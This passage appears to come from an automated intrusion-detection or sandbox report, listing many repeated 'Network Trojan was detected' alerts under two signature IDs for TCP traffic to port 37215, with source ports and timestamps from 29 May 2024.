                SID:2829579
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555708
                SID:2829579
                Source Port:47544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854538
                SID:2829579
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660378
                SID:2835222
                Source Port:58870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417090
                SID:2835222
                Source Port:43518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502693
                SID:2835222
                Source Port:41862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160407
                SID:2829579
                Source Port:33972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663242
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513175
                SID:2835222
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987383
                SID:2829579
                Source Port:55212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964512
                SID:2835222
                Source Port:52920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659674
                SID:2829579
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714348
                SID:2829579
                Source Port:49888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811699
                SID:2835222
                Source Port:60184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519906
                SID:2829579
                Source Port:48564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532073
                SID:2835222
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848957
                SID:2835222
                Source Port:57148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983006
                SID:2829579
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025168
                SID:2835222
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782227
                SID:2829579
                Source Port:55814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287385
                SID:2835222
                Source Port:34564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914685
                SID:2829579
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844517
                SID:2829579
                Source Port:45912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944024
                SID:2835222
                Source Port:56632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796092
                SID:2829579
                Source Port:55690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563368
                SID:2829579
                Source Port:36564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909221
                SID:2835222
                Source Port:36182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906351
                SID:2835222
                Source Port:35178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763140
                SID:2835222
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287130
                SID:2835222
                Source Port:56642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950292
                SID:2829579
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987196
                SID:2835222
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517853
                SID:2835222
                Source Port:46620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784818
                SID:2829579
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895599
                SID:2835222
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714155
                SID:2829579
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335138
                SID:2835222
                Source Port:37966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624580
                SID:2829579
                Source Port:46424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280862
                SID:2835222
                Source Port:46834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416610
                SID:2835222
                Source Port:42854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789177
                SID:2835222
                Source Port:37176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321107
                SID:2835222
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176862
                SID:2835222
                Source Port:47262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325730
                SID:2835222
                Source Port:57744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840370
                SID:2835222
                Source Port:50214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503637
                SID:2829579
                Source Port:35990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209435
                SID:2835222
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135953
                SID:2835222
                Source Port:43394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.577248
                SID:2835222
                Source Port:38726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659640
                SID:2835222
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276761
                SID:2829579
                Source Port:51790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184184
                SID:2835222
                Source Port:40562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321570
                SID:2835222
                Source Port:43400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551932
                SID:2835222
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653699
                SID:2829579
                Source Port:43226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165736
                SID:2829579
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175073
                SID:2829579
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951265
                SID:2829579
                Source Port:41814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415008
                SID:2835222
                Source Port:32938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573919
                SID:2829579
                Source Port:59582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867862
                SID:2835222
                Source Port:58362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988618
                SID:2829579
                Source Port:60692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.128792
                SID:2835222
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269079
                SID:2835222
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137984
                SID:2835222
                Source Port:60718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555914
                SID:2835222
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767683
                SID:2829579
                Source Port:58972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229871
                SID:2835222
                Source Port:57456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028067
                SID:2829579
                Source Port:54752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810367
                SID:2835222
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681737
                SID:2829579
                Source Port:48294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926353
                SID:2829579
                Source Port:45262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280648
                SID:2835222
                Source Port:53206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173449
                SID:2829579
                Source Port:49310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216831
                SID:2835222
                Source Port:33726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028846
                SID:2829579
                Source Port:50818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960835
                SID:2835222
                Source Port:35366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328216
                SID:2835222
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933356
                SID:2835222
                Source Port:56996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362522
                SID:2829579
                Source Port:37900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717130
                SID:2829579
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528080
                SID:2829579
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071562
                SID:2829579
                Source Port:50804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687156
                SID:2829579
                Source Port:41190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233638
                SID:2829579
                Source Port:59948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773646
                SID:2829579
                Source Port:34818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836473
                SID:2829579
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.040573
                SID:2829579
                Source Port:40532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008638
                SID:2835222
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077079
                SID:2829579
                Source Port:47732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812901
                SID:2835222
                Source Port:36146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.275327
                SID:2835222
                Source Port:40146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155568
                SID:2829579
                Source Port:50520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243000
                SID:2835222
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392576
                SID:2835222
                Source Port:51914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868928
                SID:2835222
                Source Port:42264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280443
                SID:2829579
                Source Port:45058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025055
                SID:2835222
                Source Port:59150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783328
                SID:2835222
                Source Port:49298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528515
                SID:2835222
                Source Port:60526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.438055
                SID:2835222
                Source Port:53908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933243
                SID:2835222
                Source Port:51060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233550
                SID:2829579
                Source Port:42232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166279
                SID:2835222
                Source Port:45548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842378
                SID:2835222
                Source Port:57012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785566
                SID:2829579
                Source Port:54226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282548
                SID:2829579
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820500
                SID:2829579
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463604
                SID:2829579
                Source Port:43744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873243
                SID:2829579
                Source Port:39446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776669
                SID:2829579
                Source Port:60262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932096
                SID:2829579
                Source Port:60566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824267
                SID:2829579
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544361
                SID:2829579
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970514
                SID:2829579
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444387
                SID:2835222
                Source Port:51300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993850
                SID:2829579
                Source Port:41082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914398
                SID:2829579
                Source Port:39530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510164
                SID:2835222
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281642
                SID:2829579
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586203
                SID:2835222
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422080
                SID:2829579
                Source Port:51108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582848
                SID:2835222
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.736538
                SID:2829579
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.471029
                SID:2835222
                Source Port:60542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504213
                SID:2829579
                Source Port:34278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857209
                SID:2835222
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663719
                SID:2829579
                Source Port:34892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278229
                SID:2829579
                Source Port:39690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.821500
                SID:2829579
                Source Port:45356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556787
                SID:2829579
                Source Port:37154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848689
                SID:2829579
                Source Port:59434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900151
                SID:2829579
                Source Port:48728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900448
                SID:2829579
                Source Port:34584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559474
                SID:2835222
                Source Port:44498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806809
                SID:2829579
                Source Port:46428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964241
                SID:2835222
                Source Port:44370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584802
                SID:2835222
                Source Port:45862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585037
                SID:2835222
                Source Port:43230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.737130
                SID:2829579
                Source Port:36640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782161
                SID:2835222
                Source Port:48968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786239
                SID:2835222
                Source Port:54764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992628
                SID:2829579
                Source Port:54342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178118
                SID:2829579
                Source Port:58042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114171
                SID:2829579
                Source Port:54096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779662
                SID:2829579
                Source Port:55568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210761
                SID:2829579
                Source Port:50222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928274
                SID:2829579
                Source Port:44352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583723
                SID:2835222
                Source Port:54656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848908
                SID:2829579
                Source Port:57414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225995
                SID:2835222
                Source Port:35700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856896
                SID:2835222
                Source Port:37274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782180
                SID:2835222
                Source Port:42288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981278
                SID:2835222
                Source Port:47404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895937
                SID:2829579
                Source Port:58184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909875
                SID:2835222
                Source Port:57918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.688730
                SID:2835222
                Source Port:59204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.396685
                SID:2829579
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955335
                SID:2835222
                Source Port:48788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780568
                SID:2829579
                Source Port:35836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273932
                SID:2835222
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175250
                SID:2829579
                Source Port:55206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463413
                SID:2829579
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989215
                SID:2835222
                Source Port:54482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617727
                SID:2829579
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807204
                SID:2835222
                Source Port:53234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171870
                SID:2829579
                Source Port:56546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931652
                SID:2835222
                Source Port:55376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509882
                SID:2835222
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688941
                SID:2835222
                Source Port:55220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505703
                SID:2829579
                Source Port:59904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597153
                SID:2835222
                Source Port:46396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262380
                SID:2835222
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559488
                SID:2835222
                Source Port:50476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101197
                SID:2829579
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786691
                SID:2829579
                Source Port:36304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318815
                SID:2835222
                Source Port:44708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261899
                SID:2835222
                Source Port:49072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919598
                SID:2829579
                Source Port:57982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874545
                SID:2835222
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726667
                SID:2829579
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025363
                SID:2835222
                Source Port:54686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.627038
                SID:2835222
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001902
                SID:2835222
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019353
                SID:2835222
                Source Port:34514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.671123
                SID:2829579
                Source Port:52690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032870
                SID:2829579
                Source Port:49252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810389
                SID:2829579
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905035
                SID:2835222
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369984
                SID:2835222
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321925
                SID:2835222
                Source Port:45344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.604264
                SID:2829579
                Source Port:51866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567904
                SID:2835222
                Source Port:35320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587470
                SID:2835222
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859406
                SID:2829579
                Source Port:33786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364854
                SID:2829579
                Source Port:47616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2829579
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163399
                SID:2829579
                Source Port:43410
                Destination Port:37215
